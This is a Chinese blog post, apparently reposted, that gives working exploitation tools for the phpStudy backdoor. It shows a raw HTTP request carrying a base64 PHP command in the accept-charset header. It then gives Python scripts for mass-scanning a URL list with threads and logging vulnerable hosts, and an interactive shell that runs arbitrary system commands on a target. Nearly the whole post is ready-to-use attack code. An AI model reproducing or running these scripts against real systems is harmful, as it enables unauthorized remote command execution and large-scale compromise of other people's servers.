phpstudy后门rce批量利用脚本的实现

php  /  管理员 发布于 7年前   248

写两个一个批量检测的 一个交互式shell的

暂时py 图形化的qt写出来..有点问题

后门包 :

GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1

执行那段写shell即可

晚上抽点空简单写个发包的py:

#!/usr/bin/env python3#-*- encoding:utf-8 -*-# 卿 博客:https://www.cnblogs.com/-qing-/import base64import requestsimport threadingimport queueprint("======Phpstudy Backdoor Exploit============\n")print("===========By Qing=================\n")print("=====Blog:https://www.cnblogs.com/-qing-/==\n")payload = "echo \"qing\";"payload = base64.b64encode(payload.encode('utf-8'))payload = str(payload, 'utf-8')headers = {  'Upgrade-Insecure-Requests': '1',  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',  'Accept-Language': 'zh-CN,zh;q=0.9',  'accept-charset': payload,  'Accept-Encoding': 'gzip,deflate',  'Connection': 'close',}def write_shell(url,headers):  try:    r = requests.get(url=url+'/index.php', headers=headers, verify=False,timeout=30)    if "qing" in r.text:      print ('[ + ] BackDoor successful: '+url+'===============[ + ]\n')      with open('success.txt','a') as f:          f.write(url+'\n')    else:      print ('[ - ] BackDoor failed: '+url+'[ - ]\n')  except:    print ('[ - ] Timeout: '+url+' [ - ]\n')url = "http://xxx"write_shell(url=url,headers=headers)

界面优化、改下多线程、批量读取文本文件后的代码:

#!/usr/bin/env python3#-*- encoding:utf-8 -*-# 卿 博客:https://www.cnblogs.com/-qing-/import base64import requestsimport threadingimport threadpoolprint("======Phpstudy Backdoor Exploit============\n")print("===========By Qing=================\n")print("=====Blog:https://www.cnblogs.com/-qing-/==\n")def write_shell(url):  payload = "echo \"qing\";"  payload = base64.b64encode(payload.encode('utf-8'))  payload = str(payload, 'utf-8')  headers = {  'Upgrade-Insecure-Requests': '1',  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',  'Accept-Language': 'zh-CN,zh;q=0.9',  'accept-charset': payload,  'Accept-Encoding': 'gzip,deflate',  'Connection': 'close',}  try:    r = requests.get(url=url+'/index.php', headers=headers, verify=False,timeout=30)    if "qing" in r.text:      print ('[ + ] BackDoor successful: '+url+'===============[ + ]\n')      with open('success.txt','a') as f:          f.write(url+'\n')    else:      print ('[ - ] BackDoor failed: '+url+'[ - ]\n')  except:    print ('[ - ] Timeout: '+url+' [ - ]\n')# url = "http://xxx"# write_shell(url=url,headers=headers)def main():  with open('url.txt','r') as f:    lines = f.read().splitlines()    task_pool=threadpool.ThreadPool(5)    requests=threadpool.makeRequests(write_shell,lines)  for req in requests:    task_pool.putRequest(req)    task_pool.wait() if __name__ == '__main__':  main()#线程队列部分# th=[]# th_num=10# for x in range(th_num):#     t=threading.Thread(target=write_shell)#     th.append(t)# for x in range(th_num):#     th[x].start()# for x in range(th_num):#     th[x].join()

你也可以加上读取php文件的字典 这个简单没啥说的

下一个是交互式shell

#!/usr/bin/env python3#-*- encoding:utf-8 -*-# 卿 博客:https://www.cnblogs.com/-qing-/import base64import requestsimport threadingimport threadpoolimport reprint("======Phpstudy Backdoor Exploit---os-shell============\n")print("===========By Qing=================\n")print("=====Blog:https://www.cnblogs.com/-qing-/==\n")def os_shell(url,headers,payload):  try:    r = requests.get(url=url+'/phpinfo.php',headers=headers,verify=False,timeout=10)    # print(r.text)    res = re.findall("qing(.*?)qing",r.text,re.S)    print("[ + ]===========The Response:==========[ + ]\n")    res = "".join(res)    print(res)  except:    print("[ - ]===========Failed! Timeout...==========[ - ]\n")def main():  url = input("input the Url , example:\"http://127.0.0.1/\"\n")  payload = input("input the payload , default:echo system(\"whoami\");\n")  de_payload = "echo \"qing\";system(\"whoami\");echo \"qing\";"  if payload.strip() == '':    payload = de_payload  payload = "echo \"qing\";"+payload+"echo \"qing\";"  payload = base64.b64encode(payload.encode('utf-8'))  payload = str(payload, 'utf-8')  headers = {  'Upgrade-Insecure-Requests': '1',  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',  'Accept-Language': 'zh-CN,zh;q=0.9',  'accept-charset': payload,  'Accept-Encoding': 'gzip,deflate',  'Connection': 'close',  }  os_shell(url=url,headers=headers,payload=payload)if __name__ == '__main__':  main()

 以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持。

您可能感兴趣的文章:

  • phpStudy2018安装教程及本地服务器的配置方法
  • phpStudy访问速度慢和启动失败的解决办法
  • phpStudy配置多站点多域名和多端口的方法
  • phpstudy2018 访问目录服务权限问题
  • phpstudy的php版本自由修改的方法
  • phpStudy配置多站点多域名方法及遇到的403错误解决方法
  • phpstudy默认不支持64位php的解决方法
  • 关于Windows 不能在 本地计算器 启动 Apache2(phpstudy)
  • phpStudy2016 配置多个域名期间遇到的问题小结
  • phpStudy 2011 简体中文版(A B版)
  • PHPStudy下如何为Apache安装SSL证书的方法步骤


  • 上一条:
    Vagrant(WSL)+PHPStorm+Xdebu 断点调试环境搭建
    下一条:
    PHP设计模式之数据访问对象模式(DAO)原理与用法实例分析

    • 昵称:

    邮箱:

    0条评论 (评论内容有缓存机制,请悉知!)
    Top

    Copyright·© 2019 侯体宗版权所有· 粤ICP备20027696号 PHP交流群

    侯体宗的博客